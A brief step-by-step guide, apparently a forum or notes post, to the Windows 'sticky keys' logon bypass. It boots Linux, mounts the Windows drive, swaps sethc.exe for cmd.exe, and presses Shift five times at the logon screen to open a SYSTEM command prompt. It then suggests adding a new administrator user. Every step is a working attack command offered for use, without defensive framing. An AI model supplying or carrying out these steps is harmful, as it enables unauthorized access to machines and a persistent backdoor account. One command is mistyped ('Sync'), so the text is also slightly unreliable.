- Load up any linix OS
- Mount the windows drive in a rw state: "mount -t ntfs-3g /dev/sda1 /mnt/sda1"
- Navigate to the Windows/System32 folder: "cd /mnt/sda1/Windows/System32"
- Rename sethc.exe : "mv sethc.exe sethc.bak"
- Copy cmd.exe to the name of sethc.exe: "cp cmd.exe sethc.exe"
- Sync the changes and flush buffers, Optional but safe: "Sync"
- Reboot Comp: "reboot"
- When on the logon screen hit the shift key 5 times and you should be presented with a command prompt with system priviledges. From here on you might wanna create a new user and add him to the administrators group